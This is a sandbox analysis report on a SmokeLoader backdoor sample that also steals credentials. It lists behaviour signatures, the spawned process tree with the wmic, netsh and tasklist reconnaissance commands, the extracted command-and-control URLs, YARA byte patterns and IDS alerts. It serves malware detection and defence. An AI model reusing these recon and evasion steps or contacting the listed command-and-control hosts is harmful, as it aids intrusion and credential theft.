Windows Analysis Report
KTh1gQlT9a.exe

Overview

General Information

Sample name: KTh1gQlT9a.exe (renamed because original name is a hash value)
Original sample name: 6d9b8ff6442e3c42a7ad0e1238960057.exe
Analysis ID: 1518333
MD5: 6d9b8ff6442e3c42a7ad0e1238960057
SHA1: fab711b446c2cc55f97c7a5afaa9f9833e01a0ea
SHA256: a641af0462259586cf10b8867653e163f73b6066106455605643b08ab829ac77
Tags: exe, LummaStealer, user-abuse_ch

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • KTh1gQlT9a.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\KTh1gQlT9a.exe" MD5: 6D9B8FF6442E3C42A7AD0E1238960057)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • E647.exe (PID: 4408 cmdline: C:\Users\user\AppData\Local\Temp\E647.exe MD5: 1A29ED2D1AE240EC1D6F50DCC960BAA3)
      • B575.exe (PID: 6160 cmdline: C:\Users\user\AppData\Local\Temp\B575.exe MD5: 12AD2C78F5EB326820444DCFE9DFA683)
      • explorer.exe (PID: 1684 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 6760 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 6432 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 3304 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5008 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • cmd.exe (PID: 6476 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 4580 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5020 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 356 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5176 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 764 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 2656 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5996 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 6196 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 2800 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 1100 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5840 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5500 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5428 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5988 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • ipconfig.exe (PID: 2316 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • ROUTE.EXE (PID: 5512 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
      • netsh.exe (PID: 7016 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • systeminfo.exe (PID: 2780 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • tasklist.exe (PID: 7064 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • esjbbri (PID: 3176 cmdline: C:\Users\user\AppData\Roaming\esjbbri MD5: 6D9B8FF6442E3C42A7AD0E1238960057)
  • uejbbri (PID: 3724 cmdline: C:\Users\user\AppData\Roaming\uejbbri MD5: 1A29ED2D1AE240EC1D6F50DCC960BAA3)
  • msiexec.exe (PID: 2604 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Malware configuration (SmokeLoader): {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
Source | Rule | Description | Author | Strings
00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x12208:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x12300:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

Source | Rule | Description | Author | Strings
6.2.E647.exe.24e0e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
6.2.E647.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
7.3.uejbbri.24b0000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
6.3.E647.exe.2610000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
7.2.uejbbri.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security

System Summary

Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\esjbbri, CommandLine: C:\Users\user\AppData\Roaming\esjbbri, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\esjbbri, NewProcessName: C:\Users\user\AppData\Roaming\esjbbri, OriginalFileName: C:\Users\user\AppData\Roaming\esjbbri, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\esjbbri, ProcessId: 3176, ProcessName: esjbbri
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 5840, ProcessName: WMIC.exe
Source: Process started | Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' | Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 5512, ProcessName: ROUTE.EXE
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T16:01:30.964560+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:32.199413+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:33.468152+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49713 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:34.746162+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49714 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:36.015287+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49715 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:37.606649+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:39.026227+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:40.325430+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49718 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:41.599554+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49719 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:42.875381+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49720 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:44.128986+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49721 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:45.386549+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:46.759129+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49723 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:48.049798+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49724 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:49.324358+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49725 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:50.596094+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49726 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:51.861069+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49727 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:53.130512+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49728 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:54.403705+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49729 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:55.668995+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49730 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:58.462541+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49732 | 116.58.10.60 | 80 | TCP
2024-09-25T16:01:59.729148+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:01.002562+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49735 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:02.511353+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49736 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:04.095673+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49737 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:06.505504+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49738 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:07.770118+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49739 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:09.265193+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49740 | 116.58.10.60 | 80 | TCP
2024-09-25T16:02:20.156005+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:21.806634+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49742 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:22.789674+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49743 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:23.667347+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49744 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:24.558695+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49745 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:25.615628+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49746 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:26.570388+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49747 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:27.541564+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49748 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:28.599198+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49749 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:29.775443+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49750 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:36.401964+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49751 | 23.145.40.162 | 443 | TCP
2024-09-25T16:03:21.252704+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49752 | 116.58.10.60 | 80 | TCP
2024-09-25T16:03:31.755722+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49753 | 116.58.10.60 | 80 | TCP
2024-09-25T16:03:45.252831+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49754 | 116.58.10.60 | 80 | TCP
2024-09-25T16:03:53.184311+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49755 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:04.585527+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49756 | 190.98.23.157 | 80 | TCP
2024-09-25T16:04:13.856339+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49757 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:26.957735+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49758 | 190.98.23.157 | 80 | TCP
2024-09-25T16:04:36.813735+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49759 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:50.039241+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49760 | 190.98.23.157 | 80 | TCP
2024-09-25T16:04:59.137001+0200 | 2039103 | 1 | A Network Trojan was detected | 192.168.2.5 | 49761 | 23.145.40.162 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T16:02:20.563474+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49741 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:22.175887+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49742 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:23.074361+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49743 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:23.949540+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49744 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:24.991989+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49745 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:25.892849+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49746 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:26.856911+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49747 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:27.820364+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49748 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:28.922723+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49749 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:30.052893+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49750 | 23.145.40.162 | 443 | TCP
2024-09-25T16:02:36.940781+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49751 | 23.145.40.162 | 443 | TCP
2024-09-25T16:03:53.528263+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49755 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:14.335519+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49757 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:37.139984+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49759 | 23.145.40.162 | 443 | TCP
2024-09-25T16:04:59.516202+0200 | 2809882 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49761 | 23.145.40.162 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T16:02:20.659998+0200 | 2829848 | 2 | Potentially Bad Traffic | 23.145.40.162 | 443 | 192.168.2.5 | 49741 | TCP

AV Detection

Source: KTh1gQlT9a.exe | Avira: detected
Source: http://nwgrus.ru/tmp/index.php | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\esjbbri | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Roaming\uejbbri | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Avira: detection malicious, Label: HEUR/AGEN.1310247
Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
Source: C:\Users\user\AppData\Roaming\esjbbri | ReversingLabs: Detection: 34%
Source: KTh1gQlT9a.exe | ReversingLabs: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\esjbbri | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uejbbri | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E647.exe | Joe Sandbox ML: detected
Source: KTh1gQlT9a.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Code function: 8_2_00007FF7CB8736F0 CryptExportKey,CryptExportKey,8_2_00007FF7CB8736F0
Source: C:\Users\user\AppData\Local\Temp\B575.exe | Code function: 8_2_00007FF7CB873220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,8_2_00007FF7CB873220
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03273098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,9_2_03273098
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03273717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,9_2_03273717
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03273E04 RtlCompareMemory,CryptUnprotectData,9_2_03273E04
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0327123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,9_2_0327123B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03271198 CryptBinaryToStringA,CryptBinaryToStringA,9_2_03271198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_032711E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,9_2_032711E1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03271FCE CryptUnprotectData,RtlMoveMemory,9_2_03271FCE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_0322263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,12_2_0322263E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_03222404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,12_2_03222404
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_0322245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,12_2_0322245E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_03092799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_03092799
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_030925A4 CryptBinaryToStringA,CryptBinaryToStringA,16_2_030925A4
Source: KTh1gQlT9a.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\KTh1gQlT9a.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49750 version: TLS 1.2
